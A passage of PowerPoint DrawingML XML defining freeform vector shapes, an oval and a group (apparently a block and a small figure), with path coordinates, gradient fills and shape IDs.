                    <a:gd name="T1" fmla="*/ 0 h 621"/>
                    <a:gd name="T2" fmla="*/ 0 w 2036"/>
                    <a:gd name="T3" fmla="*/ 75 h 621"/>
                    <a:gd name="T4" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T5" fmla="*/ 621 h 621"/>
                    <a:gd name="T6" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T7" fmla="*/ 545 h 621"/>
                    <a:gd name="T8" fmla="*/ 0 w 2036"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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36" h="621">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="75"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="621"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="54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14351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306" name="Freeform 2311">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E57F2B81-9EFD-462B-B7B8-0FEE08696BE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806" y="1952"/>
                  <a:ext cx="2036" cy="621"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 2036"/>
                    <a:gd name="T1" fmla="*/ 0 h 621"/>
                    <a:gd name="T2" fmla="*/ 0 w 2036"/>
                    <a:gd name="T3" fmla="*/ 73 h 621"/>
                    <a:gd name="T4" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T5" fmla="*/ 621 h 621"/>
                    <a:gd name="T6" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T7" fmla="*/ 546 h 621"/>
                    <a:gd name="T8" fmla="*/ 0 w 2036"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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36" h="621">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="621"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="54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14351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299" name="Freeform 2312">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0D17A79-FB07-447E-9482-9A1BC76B6D6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94" y="1949"/>
                <a:ext cx="50" cy="850"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 113"/>
                  <a:gd name="T1" fmla="*/ 0 h 1904"/>
                  <a:gd name="T2" fmla="*/ 0 w 113"/>
                  <a:gd name="T3" fmla="*/ 1876 h 1904"/>
                  <a:gd name="T4" fmla="*/ 113 w 113"/>
                  <a:gd name="T5" fmla="*/ 1904 h 1904"/>
                  <a:gd name="T6" fmla="*/ 113 w 113"/>
                  <a:gd name="T7" fmla="*/ 31 h 1904"/>
                  <a:gd name="T8" fmla="*/ 0 w 113"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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3" h="1904">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="1904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113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696"/>
              </a:solidFill>
              <a:ln w="14351" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="969696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300" name="Freeform 2313">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60629E91-A2F8-4B6E-BB2B-7491695C58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503" y="2194"/>
                <a:ext cx="100" cy="863"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 224 w 224"/>
                  <a:gd name="T1" fmla="*/ 0 h 1935"/>
                  <a:gd name="T2" fmla="*/ 224 w 224"/>
                  <a:gd name="T3" fmla="*/ 1873 h 1935"/>
                  <a:gd name="T4" fmla="*/ 0 w 224"/>
                  <a:gd name="T5" fmla="*/ 1935 h 1935"/>
                  <a:gd name="T6" fmla="*/ 0 w 224"/>
                  <a:gd name="T7" fmla="*/ 62 h 1935"/>
                  <a:gd name="T8" fmla="*/ 224 w 224"/>
                  <a:gd name="T9" fmla="*/ 0 h 19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4" h="1935">
                    <a:moveTo>
                      <a:pt x="224" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="224" y="1873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1935"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62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80808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301" name="Freeform 2314">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE91FE6C-5389-42A9-BD35-EFAB9BFCDCC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44" y="1963"/>
                <a:ext cx="908" cy="310"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2036"/>
                  <a:gd name="T1" fmla="*/ 0 h 694"/>
                  <a:gd name="T2" fmla="*/ 0 w 2036"/>
                  <a:gd name="T3" fmla="*/ 149 h 694"/>
                  <a:gd name="T4" fmla="*/ 2036 w 2036"/>
                  <a:gd name="T5" fmla="*/ 694 h 694"/>
                  <a:gd name="T6" fmla="*/ 2036 w 2036"/>
                  <a:gd name="T7" fmla="*/ 548 h 694"/>
                  <a:gd name="T8" fmla="*/ 0 w 2036"/>
                  <a:gd name="T9" fmla="*/ 0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36" h="694">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2036" y="694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2036" y="5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696"/>
              </a:solidFill>
              <a:ln w="14351" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="969696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302" name="Freeform 2315">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{722C349E-D323-45C3-BA99-943CF1369B4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94" y="1923"/>
                <a:ext cx="1109" cy="298"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2487"/>
                  <a:gd name="T1" fmla="*/ 59 h 669"/>
                  <a:gd name="T2" fmla="*/ 224 w 2487"/>
                  <a:gd name="T3" fmla="*/ 0 h 669"/>
                  <a:gd name="T4" fmla="*/ 2487 w 2487"/>
                  <a:gd name="T5" fmla="*/ 607 h 669"/>
                  <a:gd name="T6" fmla="*/ 2263 w 2487"/>
                  <a:gd name="T7" fmla="*/ 669 h 669"/>
                  <a:gd name="T8" fmla="*/ 0 w 2487"/>
                  <a:gd name="T9" fmla="*/ 59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7" h="669">
                    <a:moveTo>
                      <a:pt x="0" y="59"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="224" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2487" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2263" y="669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80808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076" name="Group 2070">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89D40D09-2605-4398-B549-9F6D605113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42964" y="1757581"/>
              <a:ext cx="249237" cy="500062"/>
              <a:chOff x="1823" y="2446"/>
              <a:chExt cx="318" cy="637"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2285" name="Freeform 2071">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E76E5DEB-90A8-49D7-9109-5F710F22F14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970" y="2758"/>
                <a:ext cx="120" cy="325"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 89 w 90"/>
                  <a:gd name="T1" fmla="*/ 156 h 245"/>
                  <a:gd name="T2" fmla="*/ 89 w 90"/>
                  <a:gd name="T3" fmla="*/ 7 h 245"/>
                  <a:gd name="T4" fmla="*/ 89 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 245"/>
                  <a:gd name="T6" fmla="*/ 63 w 90"/>
                  <a:gd name="T7" fmla="*/ 20 h 245"/>
                  <a:gd name="T8" fmla="*/ 12 w 90"/>
                  <a:gd name="T9" fmla="*/ 10 h 245"/>
                  <a:gd name="T10" fmla="*/ 2 w 90"/>
                  <a:gd name="T11" fmla="*/ 0 h 245"/>
                  <a:gd name="T12" fmla="*/ 3 w 90"/>
                  <a:gd name="T13" fmla="*/ 36 h 245"/>
                  <a:gd name="T14" fmla="*/ 2 w 90"/>
                  <a:gd name="T15" fmla="*/ 205 h 245"/>
                  <a:gd name="T16" fmla="*/ 43 w 90"/>
                  <a:gd name="T17" fmla="*/ 205 h 245"/>
                  <a:gd name="T18" fmla="*/ 45 w 90"/>
                  <a:gd name="T19" fmla="*/ 51 h 245"/>
                  <a:gd name="T20" fmla="*/ 36 w 90"/>
                  <a:gd name="T21" fmla="*/ 40 h 245"/>
                  <a:gd name="T22" fmla="*/ 45 w 90"/>
                  <a:gd name="T23" fmla="*/ 51 h 245"/>
                  <a:gd name="T24" fmla="*/ 43 w 90"/>
                  <a:gd name="T25" fmla="*/ 205 h 245"/>
                  <a:gd name="T26" fmla="*/ 44 w 90"/>
                  <a:gd name="T27" fmla="*/ 211 h 245"/>
                  <a:gd name="T28" fmla="*/ 88 w 90"/>
                  <a:gd name="T29" fmla="*/ 218 h 245"/>
                  <a:gd name="T30" fmla="*/ 89 w 90"/>
                  <a:gd name="T31" fmla="*/ 156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0" h="245">
                    <a:moveTo>
                      <a:pt x="89" y="156"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="141"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="89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  <a:cubicBezTo>
                      <a:pt x="55" y="20"/>
                      <a:pt x="24" y="13"/>
                      <a:pt x="12" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="10"/>
                      <a:pt x="4" y="5"/>
                      <a:pt x="2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5"/>
                      <a:pt x="43" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="171"/>
                      <a:pt x="46" y="55"/>
                      <a:pt x="45" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="47"/>
                      <a:pt x="36" y="47"/>
                      <a:pt x="36" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="47"/>
                      <a:pt x="45" y="47"/>
                      <a:pt x="45" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="55"/>
                      <a:pt x="43" y="171"/>
                      <a:pt x="43" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="207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accent1"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:schemeClr val="accent1">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent1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86" name="Freeform 2072">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E802ADFF-56C3-4A0B-A40D-64243A63DC0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1828" y="2540"/>
                <a:ext cx="313" cy="258"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 235 w 236"/>
                  <a:gd name="T1" fmla="*/ 114 h 194"/>
                  <a:gd name="T2" fmla="*/ 235 w 236"/>
                  <a:gd name="T3" fmla="*/ 114 h 194"/>
                  <a:gd name="T4" fmla="*/ 225 w 236"/>
                  <a:gd name="T5" fmla="*/ 49 h 194"/>
                  <a:gd name="T6" fmla="*/ 199 w 236"/>
                  <a:gd name="T7" fmla="*/ 24 h 194"/>
                  <a:gd name="T8" fmla="*/ 156 w 236"/>
                  <a:gd name="T9" fmla="*/ 13 h 194"/>
                  <a:gd name="T10" fmla="*/ 116 w 236"/>
                  <a:gd name="T11" fmla="*/ 2 h 194"/>
                  <a:gd name="T12" fmla="*/ 86 w 236"/>
                  <a:gd name="T13" fmla="*/ 12 h 194"/>
                  <a:gd name="T14" fmla="*/ 73 w 236"/>
                  <a:gd name="T15" fmla="*/ 86 h 194"/>
                  <a:gd name="T16" fmla="*/ 73 w 236"/>
                  <a:gd name="T17" fmla="*/ 86 h 194"/>
                  <a:gd name="T18" fmla="*/ 72 w 236"/>
                  <a:gd name="T19" fmla="*/ 91 h 194"/>
                  <a:gd name="T20" fmla="*/ 21 w 236"/>
                  <a:gd name="T21" fmla="*/ 104 h 194"/>
                  <a:gd name="T22" fmla="*/ 26 w 236"/>
                  <a:gd name="T23" fmla="*/ 135 h 194"/>
                  <a:gd name="T24" fmla="*/ 80 w 236"/>
                  <a:gd name="T25" fmla="*/ 122 h 194"/>
                  <a:gd name="T26" fmla="*/ 80 w 236"/>
                  <a:gd name="T27" fmla="*/ 122 h 194"/>
                  <a:gd name="T28" fmla="*/ 86 w 236"/>
                  <a:gd name="T29" fmla="*/ 120 h 194"/>
                  <a:gd name="T30" fmla="*/ 99 w 236"/>
                  <a:gd name="T31" fmla="*/ 112 h 194"/>
                  <a:gd name="T32" fmla="*/ 104 w 236"/>
                  <a:gd name="T33" fmla="*/ 92 h 194"/>
                  <a:gd name="T34" fmla="*/ 104 w 236"/>
                  <a:gd name="T35" fmla="*/ 92 h 194"/>
                  <a:gd name="T36" fmla="*/ 110 w 236"/>
                  <a:gd name="T37" fmla="*/ 47 h 194"/>
                  <a:gd name="T38" fmla="*/ 109 w 236"/>
                  <a:gd name="T39" fmla="*/ 167 h 194"/>
                  <a:gd name="T40" fmla="*/ 118 w 236"/>
                  <a:gd name="T41" fmla="*/ 178 h 194"/>
                  <a:gd name="T42" fmla="*/ 169 w 236"/>
                  <a:gd name="T43" fmla="*/ 192 h 194"/>
                  <a:gd name="T44" fmla="*/ 196 w 236"/>
                  <a:gd name="T45" fmla="*/ 173 h 194"/>
                  <a:gd name="T46" fmla="*/ 196 w 236"/>
                  <a:gd name="T47" fmla="*/ 160 h 194"/>
                  <a:gd name="T48" fmla="*/ 216 w 236"/>
                  <a:gd name="T49" fmla="*/ 155 h 194"/>
                  <a:gd name="T50" fmla="*/ 219 w 236"/>
                  <a:gd name="T51" fmla="*/ 154 h 194"/>
                  <a:gd name="T52" fmla="*/ 232 w 236"/>
                  <a:gd name="T53" fmla="*/ 146 h 194"/>
                  <a:gd name="T54" fmla="*/ 236 w 236"/>
                  <a:gd name="T55" fmla="*/ 124 h 194"/>
                  <a:gd name="T56" fmla="*/ 235 w 236"/>
                  <a:gd name="T57" fmla="*/ 114 h 194"/>
                  <a:gd name="T58" fmla="*/ 192 w 236"/>
                  <a:gd name="T59" fmla="*/ 75 h 194"/>
                  <a:gd name="T60" fmla="*/ 194 w 236"/>
                  <a:gd name="T61" fmla="*/ 88 h 194"/>
                  <a:gd name="T62" fmla="*/ 200 w 236"/>
                  <a:gd name="T63" fmla="*/ 123 h 194"/>
                  <a:gd name="T64" fmla="*/ 196 w 236"/>
                  <a:gd name="T65" fmla="*/ 124 h 194"/>
                  <a:gd name="T66" fmla="*/ 194 w 236"/>
                  <a:gd name="T67" fmla="*/ 88 h 194"/>
                  <a:gd name="T68" fmla="*/ 192 w 236"/>
                  <a:gd name="T69" fmla="*/ 75 h 194"/>
                  <a:gd name="T70" fmla="*/ 192 w 236"/>
                  <a:gd name="T71" fmla="*/ 71 h 194"/>
                  <a:gd name="T72" fmla="*/ 192 w 236"/>
                  <a:gd name="T73" fmla="*/ 75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6" h="194">
                    <a:moveTo>
                      <a:pt x="235" y="114"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="235" y="114"/>
                      <a:pt x="235" y="114"/>
                      <a:pt x="235" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="230" y="85"/>
                      <a:pt x="226" y="57"/>
                      <a:pt x="225" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="222" y="32"/>
                      <a:pt x="207" y="27"/>
                      <a:pt x="199" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="191" y="21"/>
                      <a:pt x="169" y="16"/>
                      <a:pt x="156" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="9"/>
                      <a:pt x="125" y="3"/>
                      <a:pt x="116" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="0"/>
                      <a:pt x="89" y="4"/>
                      <a:pt x="86" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="14"/>
                      <a:pt x="79" y="50"/>
                      <a:pt x="73" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="86"/>
                      <a:pt x="73" y="86"/>
                      <a:pt x="73" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="91"/>
                      <a:pt x="72" y="91"/>
                      <a:pt x="72" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="96"/>
                      <a:pt x="28" y="103"/>
                      <a:pt x="21" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="109"/>
                      <a:pt x="9" y="137"/>
                      <a:pt x="26" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="135"/>
                      <a:pt x="55" y="129"/>
                      <a:pt x="80" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="122"/>
                      <a:pt x="80" y="122"/>
                      <a:pt x="80" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="120"/>
                      <a:pt x="86" y="120"/>
                      <a:pt x="86" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="118"/>
                      <a:pt x="96" y="116"/>
                      <a:pt x="99" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="108"/>
                      <a:pt x="104" y="102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65"/>
                      <a:pt x="110" y="43"/>
                      <a:pt x="110" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="53"/>
                      <a:pt x="109" y="125"/>
                      <a:pt x="109" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="172"/>
                      <a:pt x="112" y="177"/>
                      <a:pt x="118" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="180"/>
                      <a:pt x="162" y="190"/>
                      <a:pt x="169" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="177" y="194"/>
                      <a:pt x="193" y="184"/>
                      <a:pt x="196" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="171"/>
                      <a:pt x="196" y="162"/>
                      <a:pt x="196" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="202" y="158"/>
                      <a:pt x="208" y="157"/>
                      <a:pt x="216" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="217" y="155"/>
                      <a:pt x="218" y="154"/>
                      <a:pt x="219" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="225" y="152"/>
                      <a:pt x="229" y="150"/>
                      <a:pt x="232" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="235" y="142"/>
                      <a:pt x="236" y="135"/>
                      <a:pt x="236" y="124"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="235" y="114"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="192" y="75"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="79"/>
                      <a:pt x="194" y="83"/>
                      <a:pt x="194" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="195" y="97"/>
                      <a:pt x="197" y="108"/>
                      <a:pt x="200" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="198" y="123"/>
                      <a:pt x="197" y="124"/>
                      <a:pt x="196" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="111"/>
                      <a:pt x="195" y="99"/>
                      <a:pt x="194" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="82"/>
                      <a:pt x="193" y="78"/>
                      <a:pt x="192" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="192" y="73"/>
                      <a:pt x="192" y="72"/>
                      <a:pt x="192" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="192" y="72"/>
                      <a:pt x="192" y="73"/>
                      <a:pt x="192" y="7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accent1"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:schemeClr val="accent1">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent1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87" name="Freeform 2073">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BFA8236-6367-4984-82DB-2353BC38644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985" y="2524"/>
                <a:ext cx="87" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 10 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 15 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 53 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 29 h 41"/>
                  <a:gd name="T10" fmla="*/ 29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4" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="10" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="21"/>
                      <a:pt x="13" y="16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29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="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88" name="Oval 2074">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{739C62E5-D545-4BEA-A17B-5CE3E058981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 flipH="1">
                <a:off x="1975" y="2454"/>
                <a:ext cx="105" cy="105"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="6350" algn="ctr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89" name="Freeform 2075">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31D1963C-76BA-4FEC-BB4E-EA6D875D6B3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952" y="2446"/>
                <a:ext cx="128" cy="68"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 54 w 94"/>
                  <a:gd name="T1" fmla="*/ 1 h 50"/>
                  <a:gd name="T2" fmla="*/ 49 w 94"/>
                  <a:gd name="T3" fmla="*/ 1 h 50"/>
                  <a:gd name="T4" fmla="*/ 48 w 94"/>
                  <a:gd name="T5" fmla="*/ 1 h 50"/>
                  <a:gd name="T6" fmla="*/ 44 w 94"/>
                  <a:gd name="T7" fmla="*/ 2 h 50"/>
                  <a:gd name="T8" fmla="*/ 43 w 94"/>
                  <a:gd name="T9" fmla="*/ 3 h 50"/>
                  <a:gd name="T10" fmla="*/ 39 w 94"/>
                  <a:gd name="T11" fmla="*/ 4 h 50"/>
                  <a:gd name="T12" fmla="*/ 39 w 94"/>
                  <a:gd name="T13" fmla="*/ 4 h 50"/>
                  <a:gd name="T14" fmla="*/ 35 w 94"/>
                  <a:gd name="T15" fmla="*/ 6 h 50"/>
                  <a:gd name="T16" fmla="*/ 34 w 94"/>
                  <a:gd name="T17" fmla="*/ 7 h 50"/>
                  <a:gd name="T18" fmla="*/ 31 w 94"/>
                  <a:gd name="T19" fmla="*/ 9 h 50"/>
                  <a:gd name="T20" fmla="*/ 30 w 94"/>
                  <a:gd name="T21" fmla="*/ 10 h 50"/>
                  <a:gd name="T22" fmla="*/ 21 w 94"/>
                  <a:gd name="T23" fmla="*/ 20 h 50"/>
                  <a:gd name="T24" fmla="*/ 21 w 94"/>
                  <a:gd name="T25" fmla="*/ 21 h 50"/>
                  <a:gd name="T26" fmla="*/ 21 w 94"/>
                  <a:gd name="T27" fmla="*/ 21 h 50"/>
                  <a:gd name="T28" fmla="*/ 20 w 94"/>
                  <a:gd name="T29" fmla="*/ 23 h 50"/>
                  <a:gd name="T30" fmla="*/ 20 w 94"/>
                  <a:gd name="T31" fmla="*/ 23 h 50"/>
                  <a:gd name="T32" fmla="*/ 0 w 94"/>
                  <a:gd name="T33" fmla="*/ 35 h 50"/>
                  <a:gd name="T34" fmla="*/ 10 w 94"/>
                  <a:gd name="T35" fmla="*/ 34 h 50"/>
                  <a:gd name="T36" fmla="*/ 16 w 94"/>
                  <a:gd name="T37" fmla="*/ 36 h 50"/>
                  <a:gd name="T38" fmla="*/ 20 w 94"/>
                  <a:gd name="T39" fmla="*/ 37 h 50"/>
                  <a:gd name="T40" fmla="*/ 40 w 94"/>
                  <a:gd name="T41" fmla="*/ 48 h 50"/>
                  <a:gd name="T42" fmla="*/ 57 w 94"/>
                  <a:gd name="T43" fmla="*/ 40 h 50"/>
                  <a:gd name="T44" fmla="*/ 94 w 94"/>
                  <a:gd name="T45" fmla="*/ 34 h 50"/>
                  <a:gd name="T46" fmla="*/ 54 w 94"/>
                  <a:gd name="T4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4" h="50">
                    <a:moveTo>
                      <a:pt x="54" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="1"/>
                      <a:pt x="51" y="1"/>
                      <a:pt x="49" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="1"/>
                      <a:pt x="48" y="1"/>
                      <a:pt x="48" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="2"/>
                      <a:pt x="46" y="2"/>
                      <a:pt x="44" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="2"/>
                      <a:pt x="44" y="2"/>
                      <a:pt x="43" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="3"/>
                      <a:pt x="41" y="3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5" y="6"/>
                      <a:pt x="35" y="7"/>
                      <a:pt x="34" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="7"/>
                      <a:pt x="32" y="8"/>
                      <a:pt x="31" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="9"/>
                      <a:pt x="31" y="9"/>
                      <a:pt x="30" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="13"/>
                      <a:pt x="24" y="16"/>
                      <a:pt x="21" y="20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2"/>
                      <a:pt x="20" y="22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7" y="27"/>
                      <a:pt x="3" y="32"/>
                      <a:pt x="0" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="32"/>
                      <a:pt x="6" y="33"/>
                      <a:pt x="10" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="34"/>
                      <a:pt x="14" y="35"/>
                      <a:pt x="16" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="36"/>
                      <a:pt x="19" y="37"/>
                      <a:pt x="20" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="41"/>
                      <a:pt x="34" y="50"/>
                      <a:pt x="40" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="48"/>
                      <a:pt x="51" y="40"/>
                      <a:pt x="57" y="40"/>
